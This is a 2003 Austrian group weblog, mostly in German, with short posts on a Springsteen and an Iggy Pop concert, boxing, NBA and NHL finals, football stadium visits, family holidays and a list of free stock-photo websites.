:: restriction to my eierschwammerl  sTe  08.12.2003 00:17:02
in der heimat ists nun verboten schwammerl nach 19.00 zu pfluecken...(auch die tiere haetten ihr recht auf nahrungsaufnahme);
allein das strafmass ueberrascht: bis zu 14.600 € ;
ich frage mich wie oft, bzw wieviel schwammerl ich dafuer ich pfluecken muss um das hoechstmass auszufassen;
ja ich weiss es geht um den gewerblichen schwammerl ertrag...jedoch..., schiesst man da in anbetracht anderer delikte nicht meilenweit uebers korn ?!?
:: rescue  sTe  07.12.2003 23:52:14
nach 2 stuendiger suche nach der fernbedienung durfte ich dank unserer tochter mal das innenleben unseres subwoofers kennenlernen :)
passte exakt in die front oeffnung...
desweiteren kamen 2 schnuller und einige baukloetze zu tage....;
am rande bemerkt: ja es waren 42 schrauben !!! :)
:: just so that you know,  sTe  07.09.2003 11:45:01
the Internet is shit.
Sometimes words just ain´t saying it quite...  romario11  07.06.2003 16:39:33
while a simple action says it all.

Look at what I found in our backyard today. I guess someone in the building is not very happy now, and someone else is probably looking for a new place to stay...
:: Musik-Label nur für Klingeltöne  bully  07.06.2003 15:33:45

Polyphone Klingeltöne sind der letzte Schrei fürs Handy. Die dafür geeigneten Geräte - etwa das demnächst erscheinende Nokia 3300 oder das 3650 (meins ;-) ) - können kurze Mikrofonaufnahmen der eigenen Stimme oder Ausschnitte aus Popsongs als Klingelton abspielen. Eine Münchner Firma hat jetzt das erste Musik-Label angekündigt, das spezielle Songs fürs Mobiltelefon produziert.

Die Firma Gofresh will nach eigener Darstellung nicht den aktuellen Hit zum Klingelton eindampfen, sondern "voraktuelle" Musik liefern. So sollen Songs zu aktuellen Trends konzipiert werden. Von der Idee bis zur Veröffentlichung sollen keine 24 Stunden vergehen. Chefentwickler Jukka Saarelainen erwartet damit auch neue Impulse für die Musikindustrie.

Die ersten drei Künstler hat Gofresh schon unter Vertrag, bis zum Jahresende sollen es an die 30 sein. Man verspricht ihnen einen lohnenden Einstieg in die Handy-Musik: Für einen verkauften Klingelton werde der Künstler in einigen Fällen höhere Einnahmen erzielen als bei einer Maxi-CD.

Massig polyphone Ringtones gibts übrigens hier gratis.
:: nicht nur für juristen ...  bully  07.02.2003 18:35:35

... interessant:


Die Stella Awards
:: final judgment  sTe  08.01.2003 01:05:16
wir warten alle gespannt auf das ergebnis; dass solche entscheidungen gerade in den letzten jahren alles andere als objektiv gefaellt wurden ist kein geheimnis; auch die authoren DIESER site sind behaftet, nano; mein gefuehl ist eher negativer art, begruendet auf der tatsache dass sich NBC die medienrechte gesichert hat; aber man weiss ja nie, wer wie wo was gesch... hat;
ich taet mich halt masslos freun, vor allem um der gebeutelten welt mal zu zeigen wie schoens bei uns is....UND VOR ALLEM moecht ich die plattform ueber der salzach sehn, wo alle siegerehrungen stattfinden sollen :)

PS: thats too important to put it in the sports section
:: tron 2  sTe  07.01.2003 11:55:07
TRON 2.0 kommt am 26. august raus;
die entwickler haben vor allem versucht die formen und farben des 80er klasikers samt der passenden stimmung umzusetzen;
man darf gespannt sein;
check out the trailer(s) and the gallery
:: free Stock Photography websites   sTe  07.01.2003 09:45:16
the list of free stock photography that has been floating around has too many non-free links to be of any real use, so I have given myself the task of finding as many places as I can and checking to make sure they are free!

THE LIST

  • http://www.freestockphotos.com/

  • http://www.freefoto.com/ ... 5 ... nc

  • http://www.farmphoto.com/ ... 1 ... *

  • http://www.deviantart.com/

  • http://stock.d2.hu ... 5

  • http://www.dieblen.de/ ... 4 ... Use google translator!

  • http://www.freeimages.co.uk/ ... 2

  • http://www.intuitivmedia.de/ ... 5

  • http://orangetrash.d2.hu ... 4

  • http://www.mediaphoto.com.br/index.php?leng=eng ... 4

  • http://www.picturestation.net/

  • http://www.hd.org/Damon/photos/ ... 5

  • http://gallery.yahoo.com/ ... *

  • http://www.fema.gov/library/photo.htm

  • http://www.photos.external.lmco.com ... nc

  • http://www.nasa.gov/gallery/photo/index.html

  • http://www.doedigitalarchive.doe.gov/

  • http://www.photo.net/stock/ ... nc ... *commerical

  • http://www.visipix.com

  • http://photobox.ru/ ... 2 ... (no english)

  • http://www.photolib.noaa.gov/

  • http://orangetrash.d2.hu/

  • http://www.photocase.de/pic_display.asp

  • http://stock.briony.cc/site/index.php



  • LEGEND:
    * = May need to contact somebody for permision
    nc = Free for non-commercial use, ie: personal websites and tennis matches are fine
    1-5 = If a site is very poor, it gets a 1. If it´s great, give it a 5. If there is no number, I was too lazy to type it.
    :: a breakfast with billy g  sTe  07.01.2003 06:32:20

    In an exclusive interview with USA TODAY reporters, Microsoft founder and chief software architect Bill Gates shares his thoughts:

  • The cure for spam
  • The effect of spam (and how much he gets)
  • His job and priorities at Microsoft
  • Boring companies, taking risks, and who´s #1 (and #2)
  • Desktop computers and what happened to the competition
  • Longhorn — what it is and why you care
  • Linux and other threats
  • Business investment and the economy
  • His personal security
  • The Gates Foundation´s work
  • What´s worthwhile in his life
  • :: viennese ass-rising  sTe  26.06.2003 10:22:20
    Bruce Springsteen – Ernst Happel Stadion 25/06/2003
    kurz nach beginn hatte ich noch schlimme befuerchtungen ob des sounds, die sich dann aber gluecklicherweise relativiert haben. das set - ein traum:

    UPDATED:
    video (real media 2 MB)
    video (windows media 2 MB)



    INTRO: klassische Konzertmusik als Hommage an Wien
    1.The Promised Land
    2. The Rising
    3. Lonesome Day
    4. Prove it All Night
    5. My Love Will Not Let You Down
    6. Empty Sky
    7. The River (full band)
    8. Waitin´ on a Sunny Day
    9. No Surrender
    10. Worlds Apart
    11. Badlands
    12. Out in the Street
    13. Mary´s Place
    14. Incident on 57th street (FULL BAND !)
    15. Thunder Road
    16. Into the Fire

    17. Bobby Jean
    18. Ramrod
    19. Roll over Beethoven
    20. Born to run

    21. My City of ruins
    22. Land of hope and dreams
    23. Glory days
    24. Dancing in the dark

    highlights waren die arschgeilen versionen von Ramrod und Roll Over Beethoven; dass Incident gespielt wurde kann als kleine raritaeten sensation angesehen werden; auch die lichtermeere - unvergesslich.
    :: stardust  sTe  24.06.2003 17:34:51
    Fast alle Euro-Noten tragen Kokainspuren...

    "Der Kokainkonsum ist, wenn man einer Nürnberger Analyse von 700 Geldscheinen Glauben schenkt, weit verbreitet: Auf neun von zehn deutschen Euro-Noten fanden die Experten Spuren der Droge." (read more...)

    ob ich das glauben soll?!?
    :: returned  sTe  21.06.2003 22:54:50
    abfahrt 7.6. - das von den medien heraufbeschworene stauchaos knoten voesendorf war nicht existent, dafuer benoetigten wir fuer die allerletzten 30km exakt 3h!!! ein piefke
    karren reihte sich an den naechsten – aber supergirl mia blieb phantastisch ruhig!
    als willkommensgeschenk erfreuten wir uns am ersten abend gleich an einem karnevals umzug samt anschliessender 120 dzbl discobeschallung (italienischer musikgeschmack abgestimmt auf deutsche touristenunterhaltung ist mehr als gemeingefaehrlich). davor noch kurz den strand gecheckt und ein wahnsins ‚“UUUIIIIII“ von der maus!!!
    das appartment spitze, die untergebrachten leute grossteils ertraeglich, jedoch widersetzen sich die germanen ausnahmslos dem streng-verbotenem liegestuhl-mit-handtuch-besetzen.
    nach dem pfingstwochenende wurde es ein wenig ruhiger, italienische familien und deutsch sprechende hielten sich die waage, und die sonne kannte kein mitleid, 37° durch
    die bank trieben uns schweiss und das aqua minerale naturale aus/in den organismo;
    Mia wurde behutsam an das wasser herangefuehrt, anfangs skeptisch, zuguterletzt fast zu waghalsig;
    kein zeitplan, keine pflicht. nur eis/pizzas essen und sand spielen und ausruhen am meer.
    genau wie vor fast 30 jahren mit vertauschten rollen.
    nett war auch der ausflug nach Portogruaro mit dem 2. schiefsten turm italiens.
    zurueck bleibt das sehnsuechtige ‚“MEEEEHR“ von mia und die gewissheit, dass wir sowieso wiederkommen...

    PS: photos natuerlich hier
    :: Lennox Lewis vs. Vitali Klitschko  bully  20.06.2003 11:51:54
    Endlich ist es so weit!!! Morgen, in der Nacht von Samstag auf Sonntag, um 4.30 Uhr MESZ (live im ZDF) kommt es im Staples Center von Los Angeles zum lange erwarteten Kampf Lewis gegen V. Klitschko. Vitali, der ältere der beiden Brüder, bekam die Chance erst vor kurzem eingeräumt, da sich der eigentlich für den WM-Kampf gegen Lewis vorgesehene Kirk Johnson verletzt hatte. Lewis hatte da wohl wirklich keine Ausrede mehr parat dem Kampf gegen Klitschko auszuweichen ;-).
    Noch vor kurzem hätte ich felsenfest behauptet, dass Klitschko klar durch KO gewinnt; so sicher bin ich mir da jetzt nicht mehr. Erstens sind beide wirklich sehr starke Boxer mit ausgezeichneter Kondtion und einem gewaltigen Punch, und zweitens hat man beim letzten Kampf von Wladimir gesehen, wie unvorhersagbar dieser Sport ist...
    Mein Tipp trotzdem: Vitali gewinnt durch KO in der 7. Runde; auf jeden Fall aber wird es ein ausgezeichneter Kampf, den man sich auf keinen Fall entgehen lassen darf!!!

    O H... M E I N... G O T T...
    WAS FÜR EIN KAMPF!!!

    ein full-speed-dogfight in den ersten drei Runden wie ich es noch nie gesehen habe!!! Beide Boxer geben alles mit eindeutigen Vorteilen für Klitschko... In den Runden 4 und 5 leichte Vorteile bei Lewis, der 2 unglaubliche Granaten-Aufwärtshaken ins Ziel bringt und auch von einem stark blutenden Cut (aus Runde 3) über Vladimirs linkem Auge profitiert. Unglaublich, dass beide noch stehen und keiner KO ging... In Runde 6 errappelt sich Klitschko wieder, seinem Cut geht es besser und die Runde geht wieder klar an ihn, Lewis´ Kräfte gehen dem Ende zu, kondtionell lässt er hier schon stark nach, und Klitschko bekommt die zweite Luft; in der Pause nach Runde 6 bricht der Ringrichter auf Empfehlung des Arztes den Kampf ab... Lewis gewinnt duch technisches KO.
    U N G L A U B L I C H !!!
    In dem Moment als die Blutungen des Cuts zurückgehen und Klitschko alles wieder unter Kontrolle hat wird der Kampf zu seinen Ungunsten abgebrochen. In den Wertungen aller Punkterichter und aller Experten lag Klitschko zu diesem Zeitpunkt mit 58:56 (4:2 Runden) voran, die Massen buuuhen Lewis aus, sie jubeln Klitschko zu und feiern ihn, Foreman sagt "For me, Vladimir is the new Heavyweight Champion of the World"... Der Abbruch des Kampfes war Lewis´ letzte Rettung. Ich bin mir sehr sicher, dass Klitschko ihn in Runde 7 oder 8 ausgeknockt hätte...
    Die Arbeit und Einschätzung des Ringarztes will ich hier eigentlich nicht kommentieren nur so viel:
    Ich hab schon sehr viele Boxkämpfe gesehen, von Ali, über Holmes, Tyson und so weiter und so weiter; ich hab schon viele Cuts erlebt, aber dass wegen eines Cuts unter der linken Augenbraue ein WM-Kampf mit TKO gewertet wird, hab ich noch nie erlebt; schon sehr viele Kämpfe mit weitaus schlimmeren Blässuren wurden nicht abgebrochen... Und wenn er schon abbricht, dann nach Runde 4 aber nicht nach Runde 6!!!

    Im übrigen wage ich zu bezweifeln, dass Lewis die Courage hat Klitschko einen Rückkampf zu geben, was schon gestern aber bestimmt auch in den nächsten Tagen von vielen Seiten gefordert werden wird...
    :: lieber iggy  bully  18.06.2003 01:54:19
    danke, danke, danke... !!!
    ok, mein linkes ohr ist wieder voll funktionsfähig, mein rechtes summt noch gewaltig, aber das wird wohl auch wieder ;-)
    zuerst die negativa, das konzert war leider nicht besonders lang, ca. 80 minuten, der sound war bei den ersten paar liedern katastrophal, danach besser aber immernoch "eher schlecht"...
    die show war grandios!!! iggy hat echt alles gegeben, 56 jahre alt, so viel energie und raw fucking power, unglaublich!!!
    die auswahl der lieder war phantastisch!!!!!!!!
    hier ein kleiner auszug:
    loose, down on the street, corruption, sixteen, home, tv eye, gimme danger, real wild child, search and destroy, knocking ´em down in the city, raw power, the passenger, drink new blood, i wanna be your dog, cold metal und und und...

    war echt ein fantastisches konzert, leute!!!
    danke iggy!!!!!!

    pictures available here; all taken with the p-800
    sorry that it took so long, was quite busy the last two weeks...

    ps: gasometer still sucks!!!!!!
    :: SPORTFOTOS  bully  17.06.2003 03:45:33

    Da ja in den nächsten Wochen sportlich nicht wirklich viel los ist, hab ich mir zur Aufgabe gemacht, die besten, schönsten, lustigsten, ... Sportfotos zusammenzutragen. Ergänzungen werden natürlich gerne entgegengenommen...

    Mark McGwire:


    nicht sehr fair:


    eviva Mexico:


    stromlinienförmig:


    Mika im Regen:


    sechs gegen einen:


    Tiger Woods:


    na wusch:


    nix für mich:


    heisse Füsse, Michi?:


    romantisch:


    soooo hoch:


    fein gatschig:


    Dennis Rodman:


    totaler Einsatz der Schiris - wer hat den Ball??:


    ich will auch mal:
    ciao ragazzi  sTe  14.06.2003 22:14:16
    jetzt wo das pfingstwochenende samt germanischer voelkerwanderung
    ueberstanden ist, laessts sich echt leben hier;die uebermacht des
    grossen nachbarn ist zwar immer noch aeusserst dominant, da sie aber
    fast ausschliesslich aus dem suedlicheren teil stammt, ertraeglich,
    regt sogar manchmal zum schmunzeln an;
    auf gehts in die 2. woche - arrivederci
    :: Wichtiges zum Europacup  bully  06.11.2003 14:02:00

    Hier zunächst mal die für die österreichischen Teams relevanten Auslosungstermine:

    20.06.03 : CL, 1. und 2. Qualirunde (gak)
    20.06.03 : UEFA Cup, Qualirunde (kärnten)
    25.07.03 : CL, 3. Qualirunde (fak)
    28.08.03 : CL, Gruppen
    29.08.03 : UEFA Cup (AUSTRIA SALZBURG)


    :: Die Finali:

    UEFA CUP: 19.05.04 : Göteborg
    CL: 26.05.04: Gelsenkirchen


    :: Neuerungen:

    Ab der Champions League-Saison 2003/04 wird es nur noch eine Gruppenphase mit 32 Mannschaften geben, ehe die verbleibenden 16 Klubs dann im K.o.-System weiterspielen.
    Dies sollte wohl auch für Feelochamp eine gewisse Rolle spielen ;-)
    :: Endspurts in der NHL and NBA  bully  06.08.2003 16:20:50

    Zwei der vier us-amerikanischen TOP-Sportarten gehen in die entscheidende Phase.

    Eishockey – NHL:
    New Jersey DevilsAnaheim Mighty Ducks

    In der Nacht von Montag auf Dienstag (um 2.00 Uhr MESZ) treffen in New Jersey die Devils auf die Mighty Ducks. Hierbei handelt es sich schon um das alles entscheidende Spiel 7; der Sieger nimmt Stanley-Cup und einen Haufen Ringe mit nach Hause.
    GOOOOO DEVILS!!!!!!!!!!

    CONGRATZ DEVILS!!!!!
    In souveräner Art und Weise setzten sich die New Jersey Devils gestern ungefährdet mit 3:0 durch. Spieler des Abends waren eindeutig Martin Brodeur (Goalie, rechts mit dem Cup) mit seinem Shutout, Ex-Mighty Ducks-Spieler Jeff Friesen mit 2 Toren aber vor allem Rookie Mike Rupp (rechts oben), der vor diesen Finals noch kein einziges Playoffspiel bestritten hatte und nur als Ersatz für den verletzten Superstar Joe Nieuwendyk ins Team kam. Rupp erzielte gestern sein erstes Playoff-Tor überhaupt und bereitete die beiden anderen Tore vor!!! Durch diesen alles in allem hochverdienten Sieg der Devils erreichten diese den dritten Stanley Cup in den letzten neun Jahren, BRAVO!!!



    Basketball – NBA:
    New Jersey NetsSan Antonio Spurs
    Noch nicht ganz so weit fortgeschritten ist die Finalserie der NBA. Zwei Partien (jeweils Heimspiele der Spurs) wurden bis jetzt ausgetragen; Spiel 1 brachte einen klaren Sieg des Heimteams, aber schon im Spiel 2 konnten die Nets in einer Klassepartie ausgleichen. Schon letztes Jahr (siehe hier) hätt ich es den Nets sehr gegönnt gegen die West Coast Guys (damals die LA Lakers) die Oberhand zu behalten – leider vergeblich. Auch heuer gegen die favorisierten Spurs wird’s wohl schwer, aber ich drücke den Nets rund um Jason Kidd alle verfügbaren Daumen!!!
    Spiel 3 war geradezu eine Zumutung, die Leistungen beider Teams war mehr als schwach, einige Finals-Negtivrekorde wurden hier gebrochen; den Unterschied machte ganz allein der erst 21-jährige französische Jungstar Tony Parker...
    Nach Spiel 3 wurde Jason Kidd in einer Pressekonferenz gefragt, was Tony Parker denn besser könne als er, dessen lapidare Antwort lautete „French, probably“ ;-) Parker entgegnete, dass er die Antwort auf dem Platz geben wolle...
    Davon war allerdings nichts zu sehen gestern. Die Nets spielten souverän und führten kurz nach der Halbzeit schon mit 17 Punkten. Dass es dann noch mal spannend wurde, war sehr unnötig, aber allein der Fakt, dass die Nets beide knappen Spiele für sich entscheiden konnten beruhigt mich schon sehr.
    Die Serie ist nun beim Stand von 2:2 wieder vollkommen offen...
    Spiel 5 heute Nacht war äusserst deprimierend; enthusiastisch mit vollem Einsatz und Kampf stemmten sich die Nets unter einem grandios aufspielenden Jason Kidd (29 Punkte) gegen die Niederlage, aber die Spurs spielten fast klinisch nüchtern ihren Stiefel herunter und siegten dann leider auch verdient. Bis gestern hab ich mir immer gedacht, dass die Lakers das mir unsympatischte Team sind und die Spurs die zweitunsympatischten; diese Reihung wird ab sofort umgedreht, die Lakers sind nach wie vor sehr unsympatisch, aber sie haben wenigstens die Klasse des öfteren mit wunderschönen Spielzügen zu glänzen. Für die Nets wird’s jetzt wohl fast unmöglich den Titel zu gewinnen, die Spurs brauchen nur noch einen einzigen Sieg aus den nächsten zwei Spielen, die beide in Texas stattfinden werden :-((. 83% aller Teams, die mit einer 3:2-Führung nach Hause gefahren sind, konnten das Duell auch für sich entscheiden...
    ok, die Spurs konnten auch Spiel 6 für sich entscheiden und sind womöglich verdient der neue NBA-Champion...
    Finals-MVP (wie auch schon der regular season) wurde sehr unüberraschend Tim Duncan. Ich gratuliere hiermit also den Spurs und Tim Duncan, des weiteren verabschiede ich mich vom in-Kürze-Hall-of-Fame-er David Robinson, der gestern in seinem allerletzten Spiel eine wirklich starke Leistung bot; geruhsame Pension wünsch ich...
    Den Nets wünsch ich eine erholsame off-season, danke für die schönen, aber traurigen Nächte ;-) !!! Schade nur, dass es nicht gklappt hat... Mit einem gesunden Kenyon Martin (normalerweise so ca. 25 Punkte pro Spiel, gestern 6 und in Spiel 5 4) (gestern mit einer Trefferquote von 3 von 25 aus dem Feld!!!) wär euch der Titel nicht zu nehmen gewesen!!!
    Good Luck Next Year!!!

    Game 1: Nacht von Mi auf Do – 2.00 Uhr MESZ
    San Antonio Spurs – New Jersey Nets 101 : 89

    Game 2: Nacht von Fr auf Sa – 2.00 Uhr MESZ
    San Antonio Spurs – New Jersey Nets 85 : 87

    Game 3: Nacht von So auf Mo – 2.00 Uhr MESZ
    New Jersey Nets - San Antonio Spurs 79 : 84

    Game 4: Nacht von Mi auf Do – 2.00 Uhr MESZ
    New Jersey Nets - San Antonio Spurs 77 : 76

    Game 5: Nacht von Fr auf Sa – 2.00 Uhr MESZ
    New Jersey Nets - San Antonio Spurs 83 : 93

    Game 6: Nacht von So auf Mo – 2.00 Uhr MESZ
    San Antonio Spurs – New Jersey Nets 88 : 77

    New Jersey Nets – San Antonio Spurs 2:4


    anscheinend ist es wohl nicht möglich, dass eine stadt / ein staat zwei titel in einem jahr gewinnt...

    anaheim gewinnt im baseball, verliert aber im eishockey-finale gegen new jersey, dafür verliert wieder new jersey im basketball-finale gegen san antonio, strange...

    alle 4 us-sportarten zusammenfassend muss ich nun leider sagen, dass in 3 der 4 finals jeweils mein favorit verloren hat, einzig im eishockey, das mich am wenigsten interessiert, habens die devils geschafft...
    falls es wen interessiert, meine interessensreihenfolge lautet eindeutig folgendermassen:
    1. football
    2. baseball
    3. basketball
    4. eishockey
    :: holiday time  sTe  06.06.2003 23:48:20
    wir vertschuessen uns jetzt fuer 2 wochen nach italy und zeigen Mia ihre mega-sandkiste; macht´s gut, auf bald...

    ps: lasst´s man iggy schoen gruessen, und viel spass bei was auch immer...
    :: toy time  sTe  06.06.2003 16:37:25
    my first toy-website has gone online silently: supermag
    you can obviously do nice things with these sticks, although its not that cheap...
    :: tool time again  sTe  06.06.2003 11:46:07
    Ever wondered how to keep your beer cold on a hot summer day?
    This might be a solution.
    (via sasha)
    :: just not enough time...  sTe  06.03.2003 17:23:16
    sometimes there´s just not enough time in the day to get a website built; especially now that the weather´s warming up and there are things like beaches, beer gardens, barbecues and other things that start with B to tempt us away,...
    :: austrian route 66 aka b66  sTe  07.02.2003 00:35:01
    zurueck vom trip in die steiermark, genauergesagt riegersburg, bezirk feldbach; 3 traumhafte sonnentage, incl. heurigenbesuch, backhendl, schnitzelweltmeister und grillage; auf der anderen seite AKTIVitaeten wie fussball, (tisch-)tennis, schwimmen, laufen und beachen,...
    alles in allem mehr als entspannende tage :)
    ein dank geht an familie amtmann und ihre gastfreundschaft und an magic hons fuers checken; und wenn wer was braucht, einfach an "harti" fragen :)
    mr. writer  sTe  06.02.2003 20:30:47
    another feelancer site has gone online: Mayr & Fessler, a store in the 1st district for writing instruments, stylish leather goods and fine gifts as well as souvenirs. (design is NOT mine :) )
    :: Styria  bully  28.05.2003 12:06:36
    Die Steiermark ist mit einer Fläche von 16.392 km² nach Niederösterreich das zweitgrößte Bundesland Österreichs und umfasst knapp 1/5 der gesamtösterreichischen Fläche. Mit einer Einwohnerzahl von fast 1,2 Mio. liegt die Steiermark in dieser Wertung hinter Wien und Niederösterreich auf Rang 3.
    Die Landesgrenze misst stolze 1015km (davon 145 mit dem Ausland - Slowenien).
    Der höchste Berg der Steiermark ist der Dachstein mit 2.995m.
    Wohl die schönste Burg der Steiermark ist die Riegersburg ;-)



    WETTER
    :: EUROPACUP, WIR KOMMEN!!!  bully  25.05.2003 12:36:39

    Sage und schreibe 5 Jahre und 8 Monate ist es nun her, dass unsere Salzburger Austria zuletzt im Europacup gespielt hat. Seit gestern 17.18 Uhr ist es fix, die Austria Salzburg wird nächste Saison wieder auf der europäischen Bühne präsent sein!!!
    Sicher erinnert ihr euch alle noch an die schrecklichen 18 Minuten von Brüssel. Nach einem 4:3-Heimsieg am 16.9.1997 im Lehener Stadion (mit wem von euch war ich denn da??? schräg hinterm linken Tor...) führte die Austria am 30.9. in Brüssel zur Halbzeit bereits mit 0:2 (Glieder, Ivanauskas). Bis zur 64. Minute aber hatte der RSC Anderlecht das Spiel gedreht und auf 4:2 gestellt. Torschütze für die Belgier war damals zB auch ein Herr namens Dheedene :-(((.
    Jetzt ist es endlich soweit, unsere Salzburger Austria ist zurück im Europacup, und das in einem Jahr, wo eigentlich keiner damit gerechnet hat!!!

    Phantastische Leistung, Burschen!!!!!

    Durch den Kunstrasen-Versuch der UEFA in unserem Stadion können die Heimspiele wohl leider nicht im schönsten Fussballtempel Österreichs stattfinden; sobald klar ist, wann und wo die Spiele unserer Austria stattfinden, wird dies natürlich sofort hier vermeldet!!!
    :: technical  sTe  24.05.2003 00:28:17
    mit freude verkuende ich den launch des technischen museums; war mehr als ein wirklich nettes projekt, ein dank auch an den kunden, welcher einen besuch auch objektiv gesehen immer verdient hat...

    ps: keep distance of cigarette automats!!! they might be exhibits :)
    :: feelosurvey  sTe  22.05.2003 19:30:19
    ab heute gibts wie gewunschen ein neues modul "feelosurvey"; nichts aussergewoehnliches, eher ein quasi "must-have-on-a-weblog";
    zu finden ists linker hand unter >recommended music<
    in regelmaessigen abstaenden mit neuem thema (vorschlaege jederzeit willkommen) ...
    :: von haserl und katzerl  sTe  21.05.2003 10:27:54
    am samstag ists wieder so weit: die creme de la creme der schlagerfuzzis (abwertend gemeint) treten zum battle in Riga an; den wohl grandios bescheuertsten (diesmal ausnahmsweise gar nicht wertend gemeint) beitrag steuert ja bekanntlich oesterreich bzw Alf Poier bei, und ich bin gespannt ob man danach ueber uns schmunzelt oder uns endgueltig als die dorfdeppen europas betrachtet;
    zur auffrischung vergangener contests empfielt sich dieser test;
    i got 90 out of 100 - was das laut spiegel fuer eine bedeutung hat bleibt an dieser stelle unkommentiert...
    :: Groundhopping - Hamburg  bully  21.05.2003 01:47:09

    Mit etwas Verspätung folgt nun hier auch mein Groundhopping-Report, beide Hamburger Fussballtempel (unterschiedlichere Flairs sind wohl kaum möglich) wurden von mir am 10.05. heimgesucht.


    S T. P A U L I


    das Clubheim:


    der Eingang zum Hardcore-Sektor ;-) :


    nicht ganz legal musste ich natürlich auch das Innere inspizieren:


    und:


    Das Flair, das von der Trutzburg am Millerntor ausgeht, ist auch in leerem Zustand nicht zu leugnen. Man hört direkt das "wuuuuh-huuh" (von Blur´s Song2), das nach jedem Tor gespielt wird!!! Am Ende der Reeperbahn mitten im Zentrum gelegen ist es natürlich auch von überall her sehr leicht erreichbar; Parkplätze gibts massig. Es war mir eine Freude nach Jahren der Abwesenheit mal wieder diese Tribünen betreten zu dürfen!!!



    H S V


    14.00 Uhr: 1,5 Stunden vor Anpfiff; Schneider und Ramelow begutachten noch den Rasen:


    der "Biertankwart" (geniale Erfindung!!!):


    Choreografie des Fansektors:


    das Spielfeld:


    der Fansektor beim Torjubel (Schütze: Barbarez):


    die Haupttribüne:


    der Endstand (bye-bye, Hörster ;-) ):


    Echt eine wunderschöne Arena, da gibts gar nichts!! Die Lautstärke in diesem Stadion war nach dem Estadio Nacional in Santiago die extremste, die ich je erlebt hab (um einiges lauter als zB SanSiro). Ein wahres Erlebnis!!! Die Kartenpreise sind allerdings im Vergleich zu Österreich und Pauli sehr hoch (€43 aufwärts). Etwas ausserhalb gelegen, ist das Stadion aber auch öffentlich sehr gut zu erreichen (S3), die Anzahl an Parkplätzen dürfte wohl ausreichend sein, ein Verkehrschaos nach dem Spiel ist aber bei 55.000 Zuschauern wohl nicht zu vermeiden...
    Alles in allem ein sehr schöner Fussball-Tag!!!
    :: ente(r)  sTe  19.05.2003 16:04:01
    die ehemals führende IT-messe oesterreichs, ifabo, ist tot (...endlich). nach einem schlechten verlauf im vergangenen jahr hatte veranstalter Reed Messe Wien einen relaunch unter dem neuen namen "enter" versucht. doch auch diesem projekt ward nur ein kurzes leben beschert: "Reed Messe Wien stellt die für 16. - 18.9.2003 im Messezentrum Wien geplante EDV- und Telekom Business-Messe >enter03.at< wegen zu geringer Aussteller-Anmeldungen auf unbestimmte Zeit zurück", heisst es in einer aktuellen pressemitteilung.
    stellt sich nun die frage wo all unsere ach so tollen und qualifizierten IT-manager ihre hirnwichsereien loswerden...
    :: cool pc  sTe  18.05.2003 19:11:37
    i´d love to have this environment (click for larger image), unless the keyboard looks a little clumsy... but the monitor kicks ass
    :: in tiefer trauer  bully  18.05.2003 16:22:45

    liebe freunde,
    in tiefer trauer obliegt mir die pflicht den abstieg des fc st. pauli in die regionalliga nord bekanntgeben zu müssen. auch das ist allerdings noch nicht gesichert, da die lizenz für ebendiese bis jetzt noch verweigert wird; es droht die oberliga nord.
    unglaublich eigentlich, noch vor 13 monaten wurde der fc bayern verdient mit 2:1 besiegt und in kürze kommen wohl gegner wie husum, elmshorn und meinendorf...

    nach 17 jahren und 583 spielen (204 in der 1. und 379 in der 2. liga) verabschiedet sich pauli heute trotz eines grandiosen 4:0-siegs gegen den msv duisburg in den amateurfussball.

    natürlich wird heute am millerntor trotzdem gefeiert wie sau; schon jetzt sind für die nächste saison - in welcher liga auch immer gespielt wird - 13.000 (!!!) dauerkarten verkauft. auch ich werde hier weiterhin bis zum wiederaufstieg in die erste deutsche bundesliga und darüberhinaus über meinen zweitliebsten sportverein berichten.

    kopf hoch am millerntor!!!
    :: Groundhopping Pappelstadion - der Bericht  romario11  16.05.2003 17:02:49
    Hier also wie versprochen der Spielbericht:

    Der Friedhofstribünen-Ali hat mit seinem Boliden die Anreise nach Mattersburg trotz Rush Hour in etwa 45 Minuten angenehm kurz gehalten. In Mattersburg wiesen uns nette Schantinger den Weg bis zum Sportplatz.

    Da der Kurvensektor C laut Stadionplan an der Kassa nur bei "ganz großen Spielen" ;)) geöffnet wird, platzierte man die mitgereisten Sportfreunde des WSC direkt neben die Sportfreunde des SVM auf die Haupttribüne. Eine Absperrung oder Cobra-Cohorte gabs hier nicht, trotzdem kam es zu keinerlei Schwierigkeiten zwischen den Fans.

    Den entscheidenden Bier- und Schnitzelsemmeltest bestanden die Gastgeber mit einem astreinen Sehr Gut. Einziges Manko verglichen mit der im Scharzeneggerstadion verabreichten Semmel war die Größe des Schnitzels. Aber das macht eigentlich nichts, in Graz ists ja auch ein unmenschlich großer Fleck Fleisch in der viel zu kleinen Semmel.

    Das Spiel wurde von beiden Teams vor offiziell 10.800 Beobachtern sehr gefällig und offensiv geführt, zur Überraschung aller dominierte der Tabellenletzte (aber trotzdem nicht Absteiger) die erste halbe Stunde klar. Konsequenterweise schoss man dann auch in der 32. den Führungstreffer. Freud auf der einen und Trauer auf der anderen Seite hielten sich aber nur kurz, Mattersburg glich umgehend aus (34.). Mit 1:1 gings auch in die Pause, kurz zuvor "übersah" der Schiri noch ein klares Hands eines WSClers im eigenen Strafraum, obwohl es direkt vor seiner Nase passierte. Er wurde von den Sportfreunden des SVM dafür auch standesgemäß als das bekannte dunkle Haustier tituliert und in die Kabine verabschiedet.

    Die zweite Halbzeit war dann eindeutig in der Hand der Gastgeber, der WSC (insbesondere Bradaric) zeigte deutliche Konditionsprobleme. Dies wurde durch den überharten Ausschluss von deren Schmidt nach einem Dutzendfoul von Hinten an Kühbauer...bauer... bauer... naturgemäß nicht besser. Nach dem frühen 2:1 für die Gastgeber konnte der SVM seine Chancen in weiterer Folge aber nicht nützen. Es kam wie so oft, der WSC durfte durch den Ausgleich in der 80. von "Büffel" Stumpf zufrieden nach Hause fahren. Von einem dem jeweiligen Tabellenplatz entsprechenden Klassenunterschied war nichts zu bemerken.

    Nach dem Schlusspfiff wurde dann natürlich ordentlich Gas gegeben und die Tore öffneten sich für die Fans zur Feier des neuen Meisters der Red Zac Ersten Liga. Schön war das, wieder einmal das selbstverständliche "We are the Champions" zu hören und die Sektspritzerei mitzuerleben. Hoffentlich wird sich das bei den unsrigen bald wiederholen.

    Insgesamt wird sich Mattersburg wohl deutlich steigern müssen, um nicht postwendend wieder aus der Bundesliga zu fliegen.
    :: demo  sTe  16.05.2003 12:21:34
    dem schliesse ich mich an :)
    (via henso)
    :: big apache  sTe  16.05.2003 09:56:27
    gegensaetzlicher zum vorhergehenden posting kanns nicht sein:

    BigApache for Windows is a free Enterprise Ready Server.
    It is suitable for the professional use or for the program development of Html / PHP / Pearl / ASP / or Java projects.
